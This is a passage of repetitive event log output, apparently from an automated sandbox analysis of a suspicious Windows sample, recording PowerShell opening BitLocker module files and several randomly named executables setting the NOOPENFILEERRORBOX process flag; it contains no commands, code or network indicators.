Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
